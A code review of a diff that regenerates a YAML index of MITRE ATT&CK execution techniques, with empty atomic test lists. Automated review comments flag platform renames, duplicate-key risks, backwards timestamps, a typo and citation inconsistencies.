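Review bot: the platform list for T1059.009 replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider`, and bumps `x_mitre_version` to `'1.1'`. Any per-platform index or filter that still matches on the old platform names will silently lose this technique, so the index generation for the renamed platforms needs to be checked in the same change rather than left to a later run.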
@@ -25197,13 +25509,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25282,12 +25593,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25298,6 +25608,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25308,16 +25619,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
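Review bot: `x_mitre_modified_by_ref` is inserted near the top of the T1059 object in this hunk (and `x_mitre_attack_spec_version: 3.2.0` in the hunk before it) while the original placements of both keys are only deleted in the following hunk; reviewing hunk by hunk, check that the old copies really are gone, because a duplicate mapping key in this YAML would be ambiguous to loaders and rejected by strict ones. The same `Office 365` / `Azure AD` / `Google Workspace` to `Office Suite` / `Identity Provider` platform rename noted for T1059.009 applies to the parent technique here.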
@@ -25348,14 +25659,11 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests: []
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25421,39 +25729,13 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests: []
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25462,6 +25744,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -25474,19 +25757,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests: []
T1059.008:
@@ -25529,7 +25835,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
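Review bot: `modified` for T1059.008 also goes backwards, from `'2022-05-11T14:00:00.188Z'` to `'2022-04-19T20:28:09.848Z'`, and the context of the following hunk shows this object keeping `x_mitre_attack_spec_version: 2.1.0` while its siblings move to `3.2.0`. As with T1559.001, the object appears to come from an older bundle than the rest of the regeneration; confirm the source before merging so the file does not mix ATT&CK releases.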
@@ -25545,72 +25851,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
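Review bot: the new bullet "Coerceing users to copy, paste, and execute malicious code manually" misspells the verb; it should read "Coercing". Since this text is pulled from the upstream ATT&CK description, the fix belongs upstream too, but the index should not ship the typo as-is. Separately, this hunk (and every later one) drops `spec_version: '2.1'` from each technique object; confirm that is how the current STIX export serializes the objects rather than an accidental change in the regeneration script, since consumers that validate the objects as STIX 2.1 may expect the field.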
@@ -25618,7 +25927,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -25633,7 +25946,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -25660,6 +25973,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
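Review bot: the new reference spells the vendor "Reliaquest" (source_name `Reliaquest-execution`, description "Reliaquest. (2024, May 31)") while the contributor added two hunks earlier is spelled "ReliaQuest"; pick one casing for the description so the rendered reference list matches the contributor entry. The `source_name` key can stay as-is if the description's `(Citation: Reliaquest-execution)` token depends on it.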
@@ -25670,15 +25987,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -25695,7 +26016,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -25743,7 +26064,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -25776,12 +26097,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -25842,8 +26162,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
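Review bot: the "Github PSAttack" reference URL changes from `https://github.com/jaredhaight/PSAttack` to `https://github.com/Exploit-install/PSAttack-1` while the description still credits "Haight, J." as the author. The new URL is a third-party copy of the repository, not the author's own; if the original repository was removed, note that in the description (or point at an archive.org capture of the original) so readers do not mistake the fork owner for the cited author.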
@@ -25865,12 +26186,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -25948,14 +26268,13 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26013,36 +26332,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests: []
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
@@ -26063,25 +26357,110 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests: []
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
